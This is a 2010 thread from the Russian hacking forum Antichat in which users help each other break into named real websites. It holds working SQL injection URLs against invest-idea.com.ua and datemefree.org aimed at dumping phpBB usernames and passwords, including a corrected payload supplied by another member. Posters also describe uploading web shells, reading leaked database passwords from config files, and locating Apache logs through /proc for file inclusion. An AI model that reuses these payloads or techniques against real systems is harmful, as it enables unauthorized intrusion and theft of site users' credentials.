Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
07.04.2010, 01:40
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
Сообщение от AC//DC
так щас пишет что Сайт временно отключен
наверное попалили
нет так он и есть.. там 100% есть уязвимость
|
|
|
07.04.2010, 02:57
|
|
Banned
Регистрация: 14.06.2008
Сообщений: 34
Провел на форуме:
119183
Репутация:
13
|
|
Залил на один ресурс шелл от madneta
прочитал файл msql-конфиг внём такая инфа
objconn.Open "Provider=SQLOLEDB;Data Source=(Local);INITIAL Catalog=POKER; User Id=sa;Password=sas;"
objconn.Open "Provider=SQLOLEDB;Data Source=(Local);INITIAL Catalog=POKER; User Id=sa;Password=ichsss;"
Мне нужно слить базу логинов и пассов. Пытаюсь приконектиться к базе через шелл, localhost
используя: логин: sa пасс:sas - не конектится, ошибка
логин=sa;Password=ichsss - тоже самое
попробывал зайти в каталог: С/msql_data_files/
там лежат папки баз от других сайтов на этом хосте но папки POKER нет (
В админку не залогиниться т.к. админ переименовал файл админки а в корневой папке ~500 файлов.
Что посоветуете господа? Очень нужно слить базу, help somebody
(новичок)
Последний раз редактировалось Darren; 07.04.2010 в 03:14..
|
|
|
|
07.04.2010, 03:07
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
попробуй http://sourceforge.net/projects/phpmsadmin/files/
|
|
|
|
07.04.2010, 15:14
|
|
Новичок
Регистрация: 04.01.2010
Сообщений: 6
Провел на форуме:
313054
Репутация:
0
|
|
Сообщение от MuTANta
ну когда есть .как узнать какая цифра и на какой лог ссылается ссыока
Вобщем так, для ясности и на глядности что и где:
Можешь посмотреть сначала на /proc/self/status на значение pid, если ты не понял то self ето ссылка на етот пид, обращайся на /proc/цыфра_которой_соответствуе т_pid/2, а там уже
Код:
ls -la /proc/цыфра_которой_соответствует_pid/fd/
итого 0
dr-x------ 2 apache apache 0 2010-04-07 14:04 ./
dr-xr-xr-x 7 apache apache 0 2010-04-07 13:56 ../
lr-x------ 1 apache apache 64 2010-04-07 14:04 0 -> /dev/null
l-wx------ 1 apache apache 64 2010-04-07 14:04 1 -> /dev/null
l-wx------ 1 apache apache 64 2010-04-07 14:04 2 -> /var/log/httpd/error_log
ссылка на логи, а проинклудишь или нет, зависит от прав. 
UPD
Кстате ты интересовался именно цыфрой, она от одмина не зависит, зависит только от количества логов который использует апач. Если хостинг апач с под пользоваетлся, на огромном хостинге то попадешь на 2, если с под апача туева куча то будешь искать, как подсказывает опыт.
Последний раз редактировалось гостъ; 07.04.2010 в 15:19..
|
|
|
|
07.04.2010, 15:41
|
|
Участник форума
Регистрация: 12.04.2009
Сообщений: 129
Провел на форуме:
150009
Репутация:
14
|
|
подобрал на сайте баблицу с логинами и пассами
Код:
http://www.invest-idea.com.ua/news.php?id=-1+union+select+1,group_concat(column_name)+from+information_schema.columns+where+table_name=0x70687062625f7573657273--
назнаю как извлечь user_id,username,user_password
Код:
http://www.invest-idea.com.ua/news.php?id=-1+union+select+1,concat_ws(0x3b,user_id,username,user_password)+from+information_schema.tables--
вот так не получается(((((( подскажите пожалуйста!!! с меня +++ !!! |
|
|
|
07.04.2010, 16:16
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846
Репутация:
56
|
|
Сообщение от Slay90
подобрал на сайте баблицу с логинами и пассами
Код:
http://www.invest-idea.com.ua/news.php?id=-1+union+select+1,group_concat(column_name)+from+information_schema.columns+where+table_name=0x70687062625f7573657273--
назнаю как извлечь user_id,username,user_password
Код:
http://www.invest-idea.com.ua/news.php?id=-1+union+select+1,concat_ws(0x3b,user_id,username,user_password)+from+information_schema.tables--
вот так не получается(((((( подскажите пожалуйста!!! с меня +++ !!! Тебе надо user_id, username и user_password тащить не из information_schema.tables, а из таблицы, которую ты указал в первом запросе
Последний раз редактировалось Redwood; 07.04.2010 в 16:30..
|
|
|
|
07.04.2010, 16:34
|
|
Участник форума
Регистрация: 12.04.2009
Сообщений: 129
Провел на форуме:
150009
Репутация:
14
|
|
http://www.invest-idea.com.ua/news.php?id=-1+union+select+1,concat_ws(0x3b,user_id,username,u ser_password)+from+0x70687062625f7573657273--
Делаю не получается =\ подскажите как правильно смотреть содержимое столбцов таблиц
|
|
|
|
07.04.2010, 17:03
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
_http://www.invest-idea.com.ua/news.php?id=-1+union+select+1,concat_ws(0x3a,username,user_pass word)+from+phpbb_users+limit+86,1--+
|
|
|
|
07.04.2010, 17:08
|
|
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
Провел на форуме:
698831
Репутация:
34
|
|
я через админку залил шелл, прохожу по ссылке и вижу "500. Внутренняя ошибка". Либо с правами на директорию что-то, либо с htaccess. Что посоветуете ?
|
|
|
|
07.04.2010, 17:15
|
|
Новичок
Регистрация: 01.02.2010
Сообщений: 12
Провел на форуме:
52455
Репутация:
18
|
|
http://www.datemefree.org/guestbook.php?to=-124926+order+by+1/*
Не могу никак подобрать поля, не обрезается запрос.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Feldmarschall]](/avatars/avatar109813.gif){kind=avatar}
Похожие темы
Линейный вид
